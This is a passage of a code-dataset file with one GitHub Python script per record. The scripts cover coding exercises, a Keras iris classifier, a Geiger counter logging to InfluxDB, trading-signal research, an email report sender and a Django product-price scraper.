(\"Articulation points in third graph \")\nprint(g3.AP()) \n","repo_name":"Nawfel1449/Articulation-points-in-graph","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39301445647","text":"# code extracted from https://github.com/classner/pymp\n\nfrom __future__ import print_function\n\nimport pymp\n \nex_array = pymp.shared.array((100,), dtype='uint8')\nwith pymp.Parallel(4) as p:\n for index in p.range(0, 100):\n ex_array[index] = 1\n # The parallel print function takes care of asynchronous output.\n p.print('Yay! {} done!'.format(index))","repo_name":"besser/pymp-test","sub_path":"test_with_pymp.py","file_name":"test_with_pymp.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"3757980512","text":"def part1(input):\n with open(input) as f:\n lines = f.readlines()\n lines = [s.strip() for s in lines]\n\n x = 1\n signalStrengths = []\n\n cycle = 1\n for line in lines:\n val = 0\n if line != \"noop\":\n val = int(line.split()[1])\n signalStrengths.append(cycle*x)\n cycle +=1\n signalStrengths.append(cycle*x)\n x += val\n cycle += 1\n \n part1 = signalStrengths[19] + signalStrengths[59] + signalStrengths[99] + signalStrengths[139] + signalStrengths[179] + signalStrengths[219]\n print(\"part1: \" + str(part1))\n \ndef writeToCrt(pos, sprite):\n if pos in sprite:\n return \"#\"\n else:\n return \".\"\n\ndef part2(input):\n with open(input) as f:\n lines = f.readlines()\n lines = [s.strip() for s in lines]\n\n sprite = (0, 1, 2)\n val = 1\n crtOutput = \"\"\n\n position = 0\n for line in lines:\n position = position % 40\n val = 0\n if line != \"noop\":\n val = int(line.split()[1])\n crtOutput += writeToCrt(position, sprite)\n position = (position + 1) % 40\n crtOutput += writeToCrt(position, sprite)\n sprite = (sprite[0]+val, sprite[1]+val, sprite[2]+val)\n position += 1\n \n print(\"part2:\")\n for i in range(0, 201, 40):\n print(crtOutput[i:i+40])\n \npart1('Day10/input/input.txt')\npart2('Day10/input/input.txt')","repo_name":"henkj/Advent-of-Code-2022","sub_path":"Day10/Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25030288084","text":"di = [0, 0, 1, -1] # 오른쪽, 왼쪽, 아래, 위 #여기서 위는 필요없음\ndj = [1, -1, 0, 0]\nladder = [] # 함수에서 사용될 ladder선언\n\n\ndef check(i, j, dir):\n if ladder[i][j] == 2:\n return True # 종료이면 True...본문에서 조건식으로 시작지점 나오게함\n elif i == 99:\n return False\n else:\n if (dir == 0) or (dir == 1):\n ni, nj = i + di[dir], j + dj[dir]\n if ni >= 0 and ni < 100 and nj >= 0 and nj < 100 and ladder[ni][nj] == 1:\n return check(ni, nj, dir)\n else: # 못갔어, 그러면 아래로(dir=2) 내려감!!!!\n return check(i + 1, j, 2)\n else: # 애초에 아래로 내려가는 중...dir=2\n for d in range(2): # d가 dir\n ni, nj = i + di[d], j + dj[d]\n if ni >= 0 and ni < 100 and nj >= 0 and nj < 100 and ladder[ni][nj] == 1:\n return check(ni, nj, d)\n return check(i + 1, j, 2) # 아래로 내려가!!!!!!!\nfor tc in range(1, 11):\n T = int(input())\n ladder = [list(map(int, input().split())) for _ in range(100)]\n start = []\n for j in range(100):\n if ladder[0][j] == 1:\n start.append(j)\n for s in start:\n if check(0, s, 2):\n print('#{} {}'.format(tc, s))\n break # 답을 찾았기 떄문에 나가줌!!!!","repo_name":"parkbum11/Algorithm","sub_path":"SWEA/LEARN/ProgrammingAdvanced/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71713924105","text":"from ejercicio1 import *\nfrom ejercicio2 import *\nfrom ejercicio3 import *\nimport time\n\nimport csv \nimport numpy as np\nwith open('/Users/hectorbernaltrujillo/Documents/informática/Programación python/ff/evaluacion_tema4/pokemon.csv', 'r') as f:\n reader = csv.reader(f)\n lista = list(reader)\n\n#CREAMOS UNA LISTA CON LOS NOMBRES:\nnombres= []\nfor i in range(1, len(lista)): \n nombres.append(lista[i][1]) #Cogemos la columna 1 que es la de los nombres\n\n#CREAMOS UNA LISTA CON LOS NUMEROS:\nnumeros= []\nfor i in range(1, len(lista)): \n numeros.append(lista[i][0]) #Cogemos la columna 0 que es la de los numeros\n\n#CREAMOS UNA LISTA CON LAS DEBILIDADES:\ntipos= []\nfor i in range(1, len(lista)): \n tipos.append(lista[i][2]) #Cogemos la columna 2 que es los tipos\n\nraiz = None\nfor i in range(len(nombres)):\n raiz = insertar_nodo(raiz, nombres[i])\n\n#NUMEROS:\nraiz2 = None\nfor i in range(len(numeros)):\n raiz2 = insertar_nodo(raiz2, numeros[i])\n\n#TIPOS:\nraiz3 = None\nfor i in range(len(tipos)):\n raiz3 = insertar_nodo(raiz3, tipos[i])\n\n\ndef iniciar():\n\n while True:\n\n print('----------------------------------------')\n print('-----------------MENU-------------------')\n print('----------------------------------------')\n print('[1] Ejercicio 1: Codificar y decodificar')\n print('[2] Ejercicio 2: Pokemons')\n print('[3] Ejercicio 3: Las 7 Maravillas')\n print('[4] Ejercicio 4: salir del programa')\n print('----------------------------------------')\n\n opcion = input('Introduce una opcion: ')\n\n if opcion == '1':\n print('.....Cargando.....')\n time.sleep(2)\n simbolos= ['A', 'F', '1', '3', 'O', 'M', 'T']\n frecuencias= [0.2, 0.17, 0.13, 0.21, 0.05, 0.09, 0.15]\n raiz= arbol_huffman(simbolos, frecuencias)\n print('\\nObtenemos los siguientes códigos por cada símbolo:')\n print('A: ', codificar('A', raiz))\n print('F: ', codificar('F', raiz))\n print('1: ', codificar('1', raiz))\n print('3: ', codificar('3', raiz))\n print('0: ', codificar('0', raiz)) #TODO: Falla al codificar el 0 \n print('M: ', codificar('M', raiz))\n print('T: ', codificar('T', raiz))\n\n while True:\n print('¿Quieres codificar algun mensaje? (SI/NO)')\n respuesta= input()\n if respuesta.upper()== 'SI':\n print('tabla de simbolos: ', simbolos)\n print('Introduce el mensaje a codificar: ')\n mensaje= input()\n print('Mensaje codificado: ', codificar(mensaje, raiz))\n print('Mensaje decodificado: ', decodificar(codificar(mensaje, raiz), raiz))\n elif respuesta.upper()== 'NO':\n print('....Volviendo al menu....')\n break\n else:\n print('Introduce SI o NO')\n\n\n \n elif opcion == '2':\n \n print('.....Cargando.....')\n time.sleep(2)\n while True:\n print('[1] Buscar pokemos por nombre o por proximidad')\n print('[2] Buscar pokemons por tipo (Fuego, Agua, Planta y Eléctrico)')\n print('[3] Mostrar listado por nombre en forma ascendente') \n print('[4] Mostrar listado por número en forma ascendente')\n print('[5] Mostrar los Pokemos que son debiles a (Jolteon, Lycanroc y Tyrantrum)')\n print('[6] Mostrar todos los tipos de pokemos y la cantidad de pokemos que hay de cada tipo')\n print('[7] Listado de nombres por nivel')\n print('[8] Nada')\n\n opcion = input('Introduce una opcion: ')\n\n if opcion == '1':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Introduce el nombre del pokemon que quieres buscar: ')\n nombre = input()\n proximidad_nombres(nombre, nombres)\n\n elif opcion == '2':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Introduce el tipo de pokemon que quieres buscar: ')\n tipo = input()\n mostrar_pokemon_tipo(tipo, tipos)\n\n elif opcion == '3':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Listado de pokemos por nombre: ')\n inorden(raiz)\n \n elif opcion == '4':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Listado de pokemos por numero: ')\n inorden(numeros)\n\n elif opcion == '5':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n print('Los pokemos que son debiles a Jolteon, Lycanroc y Tyrantrum son: ')\n debil('Jolteon', 'Lycanroc', 'Tyrantrum')\n\n elif opcion == '6':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n unicos = {}\n unicos = valores_unicos(raiz3, unicos)\n print('Hay', len(unicos), 'pokemons diferentes')\n\n elif opcion == '7':\n for i in [3,2,1]:\n time.sleep(i)\n print(f'.....Cargando en {i}.....')\n por_nivel(raiz)\n\n elif opcion == '8':\n break\n\n else:\n print('Opcion no valida')\n\n elif opcion == '3':\n grafo = Grafo()\n grafo = crear_grafo(grafo)\n print(\"El grafo creado es: \")\n print(grafo)\n print(\"El arbol de expansión minima de las maravillas arquitectónicas es: \")\n print(kruskal(grafo, \"Arquitectonica\"))\n print(\"El arbol de expansión minima de las maravillas naturales es: \")\n print(kruskal(grafo, \"Natural\"))\n print(\"Los paises que tienen maravillas arquitectónicas y naturales son: \")\n print(pais_con_maravilla_arquitectonica_y_natural(grafo))\n\n elif opcion == '4':\n print('Gracias por usar el programa')\n break\n\n else:\n print('Opcion no valida')\n\nif __name__ == '__main__':\n iniciar()\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n","repo_name":"albabernal03/evaluacion_tema4","sub_path":"Tema4/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1813998388","text":"import pandas as pd\nimport numpy as np\ndataset=pd.read_csv('iris.csv')\nX=dataset.iloc[:,0:4].values\nY=dataset.iloc[:,4].values\n\n#output lebel dummy create\nfrom keras.utils import np_utils\nfrom sklearn.preprocessing import LabelEncoder,OneHotEncoder\nlabelencoder=LabelEncoder()\nlabelencoder.fit(Y)\nY = labelencoder.transform(Y)\nY = np_utils.to_categorical(Y)\n\n#training and testing split\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,Y_train,Y_test =train_test_split(X,Y,test_size=0.2,random_state=0)# test size is a percent of whole dataset here test size is 20%\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\nmodel=Sequential()\nmodel.add(Dense(output_dim=4,activation='relu',input_dim=4))\nmodel.add(Dense(output_dim=4,activation='relu'))\nmodel.add(Dense(output_dim=3,activation='sigmoid'))\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\nmodel.fit(X_train,Y_train,batch_size=10, nb_epoch = 100)\ny_pred= model.predict(X_test)\ny_pred= (y_pred>=0.5)\nprediction = [[str(0) for i in range(1)] for j in range(len(y_pred))]#2D array \nfor i in range(0,len(y_pred)):\n s=y_pred[i]\n if(str(s[0])==\"True\"):\n prediction[i][0]=\"Iris-Setosa\"\n elif(str(s[1])==\"True\"):\n prediction[i][0]=\"Iris-Versicolor\"\n elif(str(s[2])==\"True\"):\n prediction[i][0]=\"Iris-Virginica\"\n else:\n prediction[i][0]=\"Not Matched\"\n","repo_name":"rafi138/Machine-Learning","sub_path":"Iris Class Prediction/iris_plant_class_prediction.py","file_name":"iris_plant_class_prediction.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70145780106","text":"\"\"\"\nGiven a binary search tree, write a function to find the kth smallest element in the tree.\n\nExample :\n\nInput :\n 2\n / \\\n1 3\n\nand k = 2\n\nReturn : 2\n\nAs 2 is the second smallest element in the tree.\n NOTE : You may assume 1 <= k <= Total number of nodes in BST\n \"\"\"\n\n # Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\nclass Solution:\n # @param root : root node of tree\n # @param k : integer\n # @return an integer\n def kthsmallest(self, root, k):\n count = 0\n stack = deque()\n current_element = root\n done = False\n while not done:\n if current_element is not None:\n stack.appendleft(current_element)\n current_element = current_element.left\n else:\n if stack:\n current_element = stack.popleft()\n count += 1\n if count == k:\n return current_element.val\n current_element = current_element.right\n else:\n done = True\n return\n","repo_name":"defaults/competitive-programming","sub_path":"InterviewBit/Trees/kth_smallest_element.py","file_name":"kth_smallest_element.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34550211625","text":"#\n# By Bill Roth, but I heavily used this as a reference. https://github.com/chrisys/background-radiation-monitor/blob/master/counter/counter.py\n#\n\nimport time\nimport RPi.GPIO as GPIO\nimport datetime\nfrom collections import deque\nfrom influxdb_client import InfluxDBClient\n\n\ncounts = deque()\ngPrint = True\nusvh_factor = 1.0/151.0 # this is the factor for the J305, ie number of clicks that indicates 1 microsievert, ie 1 click=1/151 of a microsievert\ngClient = None\ngWriteApi = None\n\ndef countme(channel):\n global counts,gPrint\n timestamp = datetime.datetime.now()\n counts.append(timestamp)\n return\n\ndef setup():\n global gClient,gWriteApi\n\n if gPrint:\n print(\"running setup\")\n GPIO.setmode (GPIO.BOARD)\n GPIO.setup(7, GPIO.IN)\n GPIO.add_event_detect(7, GPIO.FALLING, callback=countme)\n if gPrint:\n print(\"done with setup\")\n gClient = InfluxDBClient(url=\"YOURINFLUXDBIPANDPORT\", token='YOURINFLUXDB2TOKEN', org='YOUORG')\n gWriteApi = gClient.write_api()\n\n return\n\ndef sendDataPoint(p):\n '''send datapoint to the database'''\n global gWriteApi\n gWriteApi.write(\"bucket\", \"org-name\",p)\n\n return\n\ndef main():\n global gPrint\n setup()\n\n loopCount = 0\n while True:\n loopCount += 1\n try:\n while counts[0] < datetime.datetime.now() - datetime.timedelta(seconds=60):\n counts.popleft()\n except IndexError:\n pass # there are no records in the queue.\n\n if loopCount == 10:\n loopCount=0\n microsieverts = len(counts)*usvh_factor\n measurements = [\n {\n 'measurement': 'radiation',\n 'fields': {\n 'cpm': int(len(counts)),\n 'usvh': microsieverts\n }\n }\n ]\n if gPrint:\n print(measurements)\n sendDataPoint(measurements)\n\n time.sleep(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wgroth2/pi-stuff","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74358380106","text":"#https://leetcode.com/problems/01-matrix/solution/\n\nfrom typing import List\n\nclass Solution:\n def updateMatrix(self, matrix: List[List[int]]) -> List[List[int]]:\n m = len(matrix)\n if m == 0:\n return\n n = len(matrix[0])\n\n dist = [[100 for col in range(n)] for row in range(m)]\n\n for i in range(m):\n for j in range(n):\n if matrix[i][j] == 0:\n dist[i][j] = 0\n else:\n dist[i][j] = min(dist[i][j], min(100 if i == 0 else dist[i-1][j], 100 if j == 0 else dist[i][j-1]) + 1)\n\n for i in range(m-1, -1, -1):\n for j in range(n-1, -1, -1):\n if matrix[i][j] == 0:\n dist[i][j] = 0\n else:\n dist[i][j] = min(dist[i][j], min(100 if i == (m - 1) else dist[i+1][j], 100 if j == (n - 1) else dist[i][j+1]) + 1)\n\n return dist\n\n\ns = Solution()\n\nprint(s.updateMatrix([[0,0,0],\n [0,1,0],\n [0,0,0]]))","repo_name":"SergeySatunin/leetcode","sub_path":"dynamic_programming/0_1_matrix.py","file_name":"0_1_matrix.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11620312595","text":"import rebound\nimport unittest\nimport os\nfrom rebound.interruptible_pool import InterruptiblePool\n \ndef runsim(param):\n sim = rebound.Simulation()\n sim.add(m=1.)\n sim.add(a=param)\n sim.integrate(0.1)\n return sim.particles[1].x\n\nclass TestInterruptiblePool(unittest.TestCase):\n def test_nopool(self):\n pool = InterruptiblePool(2)\n params = [1.,1.1]\n res = [runsim(params[0]), runsim(params[1])]\n self.assertAlmostEqual(res[0],0.9950041652780258,delta=1e-15)\n self.assertAlmostEqual(res[1],1.095870355119381,delta=1e-15)\n\n def test_pool(self):\n pool = InterruptiblePool(2)\n params = [1.,1.1]\n res = pool.map(runsim,params)\n self.assertAlmostEqual(res[0],0.9950041652780258,delta=1e-15)\n self.assertAlmostEqual(res[1],1.095870355119381,delta=1e-15)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"shangfei/rebound-sph","sub_path":"rebound/tests/test_interruble_pool.py","file_name":"test_interruble_pool.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"38806528511","text":"from BarraFactor.barra_factor import *\nfrom AIndustryRotation.FactorTest import *\nfrom BasicTools import *\n\nclass BigAmt(object):\n def __init__(self,start_date = 20150101,end_date = 20201231,ind='SW1',fee=0.001,bench_list=['SZZZ','CYB','wind_A']):\n self.start_date = start_date\n self.end_date = end_date\n self.fee = fee\n self.ind = ind\n # 获取因子和因子值\n date_list = get_date_range(get_pre_trade_date(start_date,900), end_date)\n self.date_list = date_list\n self.bench_list = bench_list\n # --------------------------------------- 指数的基础数据 ------------------------------------------ #\n bench_open = get_daily_1factor('open',date_list=date_list, code_list=bench_list,type='bench')\n bench_high = get_daily_1factor('high', date_list=date_list, code_list=bench_list, type='bench')\n bench_low = get_daily_1factor('low', date_list=date_list, code_list=bench_list, type='bench')\n bench_close = get_daily_1factor('close', date_list=date_list, code_list=bench_list, type='bench')\n bench_amt = get_daily_1factor('amt', date_list=date_list, code_list=bench_list, type='bench')\n\n self.bench_open = bench_open\n self.bench_high = bench_high\n self.bench_low = bench_low\n self.bench_close = bench_close\n self.bench_amt = bench_amt\n\n # --------------------------------------- 行业的基础数据 ------------------------------------------ #\n code_list = get_real_ind(ind[:-1], int(ind[-1]))\n self.ind_list = code_list\n ind_open = get_daily_1factor('open', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_high = get_daily_1factor('high', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_low = get_daily_1factor('low', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_close = get_daily_1factor('close', date_list=date_list, code_list=code_list, type=ind[:-1])\n ind_amt = get_daily_1factor('amt', date_list=date_list, code_list=code_list, type=ind[:-1])\n\n self.ind_open = ind_open\n self.ind_high = ind_high\n self.ind_low = ind_low\n self.ind_close = ind_close\n self.ind_amt = ind_amt\n\n # --------------------------------------- 个股的基础数据 ------------------------------------------ #\n open = get_daily_1factor('open', date_list=date_list)\n high = get_daily_1factor('high', date_list=date_list)\n low = get_daily_1factor('low', date_list=date_list)\n close = get_daily_1factor('close', date_list=date_list)\n amt = get_daily_1factor('amt', date_list=date_list)\n\n self.open = open\n self.high = high\n self.low = low\n self.close = close\n self.amt = amt\n\n # ----------------------------- 构造因子 ------------------------------- #\n def FactorData(self,bench,days=20):\n if bench in bench_name.keys():\n log_amt = np.log(self.bench_amt[bench])\n else:\n log_amt = np.log(self.ind_amt[bench].dropna())\n\n amt_signal = (log_amt - log_amt.rolling(days).mean()) / log_amt.rolling(days).std()\n\n return amt_signal\n\n # ----------------------------- 交易信号:即根据某个阈值信号参与交易 ------------------------- #\n def TradeSignal(self,bench):\n amt_signal20, amt_signal60 = self.FactorData(bench, days=20), self.FactorData(bench, days=60)\n\n signal_mean20, signal_std20 = amt_signal20.rolling(252 * 3).mean(), amt_signal20.rolling(252 * 3).std()\n signal_mean60, signal_std60 = amt_signal60.rolling(252 * 3).mean(), amt_signal60.rolling(252 * 3).std()\n\n buy_signal = (amt_signal20 > signal_mean20 + 1.5 * signal_std20) | (amt_signal60 > signal_mean60 + 1.5 * signal_std60)\n sell_signal = (amt_signal20 < signal_mean20) | (amt_signal60 < signal_mean60)\n\n trade_signal = (buy_signal & (~sell_signal)).loc[get_pre_trade_date(self.start_date,120):self.end_date]\n\n return trade_signal\n\n # ----------------------------- 策略信号:即参与市场交易周期的信号 -------------------------- #\n def StrategySignal(self,bench):\n amt_signal20, amt_signal60 = self.FactorData(bench, days=20), self.FactorData(bench, days=60)\n\n signal_mean20, signal_std20 = amt_signal20.rolling(240 * 3).mean(), amt_signal20.rolling(240 * 3).std()\n signal_mean60, signal_std60 = amt_signal60.rolling(240 * 3).mean(), amt_signal60.rolling(240 * 3).std()\n\n buy_signal = (amt_signal20 > signal_mean20 + 1.5 * signal_std20) | (amt_signal60 > signal_mean60 + 1.5 * signal_std60)\n sell_signal = (amt_signal20 < signal_mean20) | (amt_signal60 < signal_mean60)\n\n strategy_signal = buy_signal * 1 + sell_signal * -1\n strategy_signal = strategy_signal.replace(0, np.nan).ffill().fillna(0).loc[self.start_date:self.end_date]\n\n return strategy_signal\n\n # ----------------------------- 最终信号测试和信号汇总 --------------------------------- #\n def AllResult(self, bench, factor_days=20, trade_time='open', future_days=10, strategy='first'):\n if bench in bench_name.keys():\n price = self.bench_open[bench] if trade_time=='open' else self.bench_close[bench]\n else:\n price = self.ind_open[bench] if trade_time == 'open' else self.ind_close[bench]\n # 1、因子值 及 因子值的测试结果\n amt_signal = self.FactorData(bench,days=factor_days)\n data_result, group_num, group_pct = GroupTest(amt_signal, price, future_days=10, rol_days=252 * 3, group='std')\n\n # 2、交易信号 及 交易信号的测试结果\n trade_signal = self.TradeSignal(bench)\n trade_list, TradeResult = TradeSignalTest(trade_signal, price, before_days=10, future_days=future_days,trade_strategy=strategy)\n\n # 3、策略信号 及 策略信号的测试结果\n strategy_signal = self.StrategySignal(bench)\n net_values, StrategyResult = StrategySingalTest(strategy_signal.replace(-1, 0), bench=bench, trade_time=trade_time,buy_way=1)\n\n return amt_signal,data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult\n\n # 所有指数/行业的信号综合\n def AllStrategy(self, bench_type = 'bench', trade_time = 'open', future_days = 10):\n if bench_type == 'bench':\n bench_price = self.bench_close.copy() if trade_time == 'close' else self.bench_open.copy()\n elif bench_type == 'SW1':\n bench_price = self.ind_close.copy() if trade_time == 'close' else self.ind_open.copy()\n\n all_trade_signal, all_strategy_signal = pd.DataFrame(), pd.DataFrame()\n trade_test, strategy_test = pd.DataFrame(), pd.DataFrame()\n\n\n for bench in tqdm(bench_price.columns):\n amt_signal, data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult = \\\n self.AllResult(bench, factor_days=20, trade_time=trade_time, future_days=future_days, strategy='first')\n\n all_trade_signal = pd.concat([all_trade_signal, trade_signal.rename(bench)], axis=1)\n all_strategy_signal = pd.concat([all_strategy_signal, strategy_signal.rename(bench)], axis=1)\n\n trade_test = pd.concat([trade_test, TradeResult.loc['all'].rename(bench)],axis=1)\n strategy_test = pd.concat([strategy_test, StrategyResult['all'].rename(bench)],axis=1)\n\n return all_trade_signal, all_strategy_signal, trade_test, strategy_test\n\n\nif __name__ == '__main__':\n # ------------------------------- 测试使用 ------------------------------ #\n ind, start_date, end_date = 'SW1', get_recent_trade_date(20171231), get_recent_trade_date()\n self = BigAmt(start_date, end_date, ind, fee=0.001)\n bench,factor_days = 'CYB', 20\n trade_time, future_days = 'open', 10\n # 1、 测试单因子有效性:如果计划测试因子及参数有效性,则使用下面代码:考察其分组收益,和是否有偏\n amt_signal, data_result, group_num, group_pct, trade_signal, TradeResult, strategy_signal, StrategyResult = \\\n self.AllResult(bench, factor_days=factor_days, trade_time=trade_time, future_days=future_days, strategy='first')\n\n print('偏度和IC:\\n',data_result.astype(float).round(4))\n print('收益率分布:\\n', group_pct.astype(float).round(4))\n # 如果分组良好,偏度良好,那么就开始进行交易信号和策略信号的测试\n print('交易信号输出结果:\\n',TradeResult.astype(float).round(4))\n print('策略多头结果:\\n', StrategyResult.astype(float).round(4))\n\n\n # ---------------------------- 计划运行使用 ---------------------------------- #\n ind, start_date, end_date = 'SW1', 20151231, get_recent_trade_date()\n trade_by, future_days = 10, 'open'\n self = BigAmt(start_date, end_date, ind, fee=0.001)\n # 1、使用单因子:signal表示交易信号,strategy表示策略持仓信号\n bench_trade_signal, bench_strategy_signal, bench_trade_test, bench_strategy_test = self.AllStrategy(bench_type='bench')\n ind_trade_signal, ind_strategy_signal, ind_trade_test, ind_strategy_test = self.AllStrategy(bench_type='SW1')\n\n","repo_name":"gftaoxin/StrategyPythonCode","sub_path":"AMatketTiming/TradeSignal/Signal1_BigAmt.py","file_name":"Signal1_BigAmt.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44363355746","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 4 15:12:02 2019\r\n\r\n@author: willi\r\n\"\"\"\r\n\r\ndef send_email(week_num, report_name):\r\n import email\r\n import email.mime.application\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.image import MIMEImage\r\n import smtplib\r\n import csv\r\n \r\n # Create a text/plain message\r\n group = []\r\n msg = email.mime.multipart.MIMEMultipart()\r\n msg['Subject'] = 'Weekly Report'\r\n msg['From'] = 'trendspptx@gmail.com'\r\n \r\n answer = input('Use emails from file? (y/n): ')\r\n if answer.lower() == 'y':\r\n answer = input('Use default list? (y/n): ')\r\n if answer.lower() == 'y':\r\n with open('email_list.csv', 'r') as f:\r\n for line in csv.reader(f):\r\n group.append(line[0])\r\n else:\r\n answer = input(\"Enter file name '.csv',\\ne.g. email_list.csv: \")\r\n with open(answer, 'r') as f:\r\n for line in csv.reader(f):\r\n group.append(line[0]) \r\n else:\r\n to = input('Enter email to send to,\\ne.g. trendspptx@gmail.com: ')\r\n print(\"When finished type 'done': \")\r\n \r\n while to.lower() != 'done':\r\n group.append(to)\r\n to = input('Please enter next email: ')\r\n\r\n print('\\nSending emails to:\\n', group)\r\n \r\n msg['To'] = ','.join(group)\r\n \r\n # The main body is just another attachment\r\n body = email.mime.text.MIMEText(\"Report for Week \" + str(week_num))\r\n msg.attach(body)\r\n \r\n # Input the file location, including the file name and type\r\n fp = open(report_name,'rb')\r\n \r\n # edit subtype to replicate the document type\r\n att = email.mime.application.MIMEApplication(fp.read(),_subtype=\"pptx\")\r\n fp.close()\r\n att.add_header('Content-Disposition','attachment',filename=report_name)\r\n msg.attach(att)\r\n \r\n s = smtplib.SMTP(\"smtp.gmail.com\", 587, timeout=120)\r\n s.starttls()\r\n \r\n # Your login information\r\n s.login('trendspptx','M******5')\r\n \r\n # Email information (from address, [recipient email addresses])\r\n s.sendmail('trendspptx@gmail.com',group, msg.as_string())\r\n s.quit()","repo_name":"wsum92/pptx","sub_path":"email_report.py","file_name":"email_report.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"8862831257","text":"from collections import OrderedDict\nfrom urllib.parse import urlencode\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse, reverse_lazy\nfrom django.http import Http404\nfrom .forms import ContactForm, ProductUpdateForm, UserForm\nfrom .models import Product, User, PriceHistory, ProductToUser\nfrom bs4 import BeautifulSoup\nimport requests\nimport shutil\nimport secrets\nimport os\nfrom django.views.generic.base import TemplateView\nfrom django.views.generic import DetailView\nfrom django.views import View\nfrom django.views.generic.edit import DeleteView, FormMixin\nfrom django.core.mail import send_mail\nfrom bokeh.embed import components\nfrom bokeh.models import Range1d, DatetimeTickFormatter, NumeralTickFormatter\nfrom bokeh.plotting import figure\nimport pandas as pd\n\n\n# Create your views here.\n\n# Dict stores HTML and CSS info extracted from product URLs so the correct tags can be found when scraping.\nbrand_specs = {'Frankie_Shop':\n {'price': (\"strong\", {\"class\": \"prd-DetailPrice_Price\"}),\n 'image': (\"div\", {\"class\": \"prd-Detail_Image\"})\n },\n 'Ganni':\n {'price': (\"span\", {\"class\": \"product-price__normal\"}),\n 'image': (\"div\", {\"class\": \"b-product-images__large\"}),\n },\n 'Reformation':\n {\n 'price': (\"span\", {\"class\": \"price--reduced\"}),\n 'image': (\"div\", {\"class\": \"pdp__images-main-container\"})\n }\n }\n\n\nclass IndexView(View):\n # func will be called when post request is received\n def post(self, request):\n # instanciate the user form and retrieve contents from post request\n user_form = UserForm(request.POST)\n my_url = \"\"\n\n # validate form\n if user_form.is_valid():\n # clean data received from post request\n user_data = user_form.cleaned_data\n\n # scrape url provided by user to fetch name, brand, and image\n user_url = user_data['product_url']\n soup = self.scrape_from_url(user_url)\n product_name, product_brand = self.fetch_name_brand(user_url, soup)\n out_src, new_img = self.fetch_image(product_brand, soup)\n\n # get or create object from Product db with scrapped values for name, brand and img\n user_product = Product.objects.get_or_create(\n product_url=user_url,\n name=product_name,\n brand=product_brand,\n img_out_src=out_src,\n img=new_img)\n\n # get or create object from User db with post request value for email\n user = User.objects.get_or_create(\n user_email=user_data['user_email'])\n\n # fetch current price and save as a new entry on PriceHistory db\n first_price = self.fetch_price(user_product[0], soup)\n product_price = PriceHistory(\n linked_product=user_product[0], price=first_price)\n product_price.save()\n\n # fecth product to user entry from db based on user and linked_product\n product_to_user = ProductToUser.objects.filter(\n user_id=user[0], linked_product=user_product[0]).first()\n\n # if no result is returned, create an entry on db\n if not product_to_user:\n new_prod_user = ProductToUser(\n user_id=user[0], linked_product=user_product[0], desired_price=user_data[\"desired_price\"], auth_token=self.auth_token())\n new_prod_user.save()\n\n # redirect to thank-you URL\n base_url = reverse('submit-successful') # 1 thank-you/\n # 2 auth=bhejwbhr374637hfd\n query_string = urlencode({'auth': new_prod_user.auth_token})\n # 3 /thank-you/?auth=bhejwbhr374637hfd\n my_url = '{}?{}'.format(base_url, query_string)\n\n # sends email to user confirming submition success.\n 